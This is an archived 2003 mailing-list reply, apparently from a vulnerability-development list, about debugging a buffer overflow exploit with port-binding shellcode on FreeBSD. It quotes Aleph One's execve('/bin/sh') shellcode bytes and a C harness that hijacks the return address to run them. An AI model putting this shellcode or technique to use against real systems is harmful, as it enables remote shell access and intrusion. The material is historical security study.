Re: sample buffer overflow exploit problem

From: Ganbold (ganbold_at_micom.mng.net)
Date: 09/30/03

  • Next message: Gerardo Richarte: "Re: sample buffer overflow exploit problem" 
    Date: Tue, 30 Sep 2003 10:26:35 +0900
To: "deepcode ." <pondermate@hotmail.com>

    Deepcode,

    I tested my shellcode by function pointer(tested in Aleph1's code) and it
    works fine without any problem. I can connect to it using telnet.
    Since shell is bind to port I can issue commands.

    If you have time, can you try my codes on your machine?

    Ganbold

    At 07:45 PM 9/29/2003 -0300, you wrote:

    >Indeed, if you believe that the shellcode has the problem, try just
    >testing the shellcode by a funtion pointer: I ripped this code from Aleph
    >Ones smashing the stack.
    >
    >char shellcode[] =
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    > "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    >
    >void main() {
    > int *ret;
    >
    > ret = (int *)&ret + 2;
    > (*ret) = (int)shellcode;
    >
    >}
    >
    >replace the shellcode and try it out. If it still doesn't work, then grab
    >some new bsd shellcodes. A good site (if it still exists) is
    >http://www.shellcode.com.ar/
    >
    >They have some good shellcodes. Try grabbing as many as you can and
    >checking until u get one that works. If it still doesn't work, then a
    >closer inspection of the code would be in order, I can't quite test
    >myself, BSD doesn't like my hard drive, but I will try this code of yours
    >on debian soon.
    >
    >deepcode
    >
    >_________________________________________________________________
    >Add photos to your e-mail with MSN 8. Get 2 months FREE*.
    >http://join.msn.com/?page=features/featuredemail
    >
    >

  • Next message: Gerardo Richarte: "Re: sample buffer overflow exploit problem"

    Relevant Pages

    • Re: about shell code(expoit code) detector...
      ... about shell codedetector... ... You can detect exploits, not shellcode or. ... You could use anything that works with edx or any other reg that isn't used ...
      (Focus-IDS)
    • Re: jizzy.c -- sendmail remote exploit (POSSIBLE TROJAN)
      ... That's what's usually in the shellcode. ... >>another shell running as the user running the program. ... >It connects to an SMTP server and sends the shellcode, ...
      (comp.security.unix)
    • Re: jizzy.c -- sendmail remote exploit (POSSIBLE TROJAN)
      ... That's what's usually in the shellcode. ... >>another shell running as the user running the program. ... >It connects to an SMTP server and sends the shellcode, ...
      (comp.security.unix)
    • Re: sample buffer overflow exploit problem
      ... with shellcode. ... I'm trying to exploit sample network server in FreeBSD 5.1 ... >>launches the shell in the remote machine. ... >>However when I try to use port binding shell code, ...
      (Vuln-Dev)
    • Re: buffer overflow to spawn shell
      ... I did not say I wrote a shell: I said I have one working on my computer ... Since I am quiet a newbie with buffer overflows exploits and I want to ... where have you got shellcode from? ...
      (comp.os.linux.security)